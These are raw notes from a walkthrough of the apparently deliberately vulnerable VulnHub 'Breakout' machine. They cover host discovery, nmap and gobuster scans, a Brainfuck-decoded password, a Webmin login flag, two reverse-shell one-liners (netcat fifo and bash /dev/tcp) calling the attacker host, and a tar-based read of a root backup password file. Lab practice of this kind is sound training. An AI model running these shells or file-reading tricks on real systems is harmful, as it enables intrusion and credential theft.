HOST DESCOVERY

"""
 Currently scanning: 192.168.111.0/16   |   Screen View: Unique Hosts                                                                                                
                                                                                                                                                                     
 6 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 360                                                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.100.4   04:79:70:f0:45:b7      2     120  HUAWEI TECHNOLOGIES CO.,LTD                                                                                       
 192.168.100.1   24:44:27:2a:9c:c0      2     120  HUAWEI TECHNOLOGIES CO.,LTD                                                                                       
 192.168.100.6   60:f6:77:8b:13:7f      1      60  Intel Corporate                                                                                                   
 192.168.100.37  08:00:27:54:a8:36      1      60  PCS Systemtechnik GmbH                                                                                            



"""

NAMP 
"""



┌──(kali㉿kali)-[~/Desktop/THM/VULNHUB/BREAKOUT]
└─$ sudo nmap   -sV -sC --min-rate 2000  $IP  -oN nmap.txt 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 11:59 EST
Nmap scan report for 192.168.100.37
Host is up (0.00034s latency).
Not shown: 995 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-title: 200 &mdash; Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 &mdash; Document follows
MAC Address: 08:00:27:54:A8:36 (Oracle VirtualBox virtual NIC)

Host script results:
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-03-11T16:59:39
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.33 seconds


┌──(kali㉿kali)-[~/Desktop/THM/VULNHUB/BREAKOUT]
└─$ sudo nmap  -p- -sV -sC --min-rate 2000  $IP  -oN nmap.txt 
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 12:16 EST
Nmap scan report for 192.168.100.37
Host is up (0.00029s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 &mdash; Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 &mdash; Document follows
MAC Address: 08:00:27:54:A8:36 (Oracle VirtualBox virtual NIC)

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-03-11T17:17:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.78 seconds

"""


GOBUSTER

"""



┌──(kali㉿kali)-[~/Desktop/THM/VULNHUB/BREAKOUT]
└─$ gobuster dir -u http://192.168.100.37/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -t 80 --no-error  
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.37/
[+] Method:                  GET
[+] Threads:                 80
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/11 12:03:20 Starting gobuster in directory enumeration mode
===============================================================
/manual               (Status: 301) [Size: 317] [--> http://192.168.100.37/manual/]
/server-status        (Status: 403) [Size: 279]                                    
                                                                                   
===============================================================
2022/03/11 12:04:35 Finished
===============================================================





"""









SOURCE CODE OF MAIN PAGE:

"""
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.



Console

.2uqPEfj3D<P'a-3

Memory:
[1] = (10)
[2] = 3 (51)
[3] = P (80)
[4] = a (97)

"""


SMB
"""

S-1-22-1-1000 Unix User\cyber (Local User)

 =============================================== 
|    Getting printer info for 192.168.100.37    |
 =============================================== 
No printers returned.


enum4linux complete on Fri Mar 11 12:33:50 2022



"""


WE GOT A USERNAME cyber and password above .2uqPEfj3D<P'a-3

LOGIN 


"""
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}




rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.33 1234 >/tmp/f


bash -i >& /dev/tcp/192.168.100.33/1234 0>&1

got shell in terminal 
"""

PRIV ESC

"""

cyber@breakout:~$ ./tar -cf bak.tar /var/backups/.old_pass.bak
./tar -cf bak.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ tar -xf bak.tar
tar -xf bak.tar
cyber@breakout:~$ cat var/backups/.old_pass.bak
cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~$ 



"""
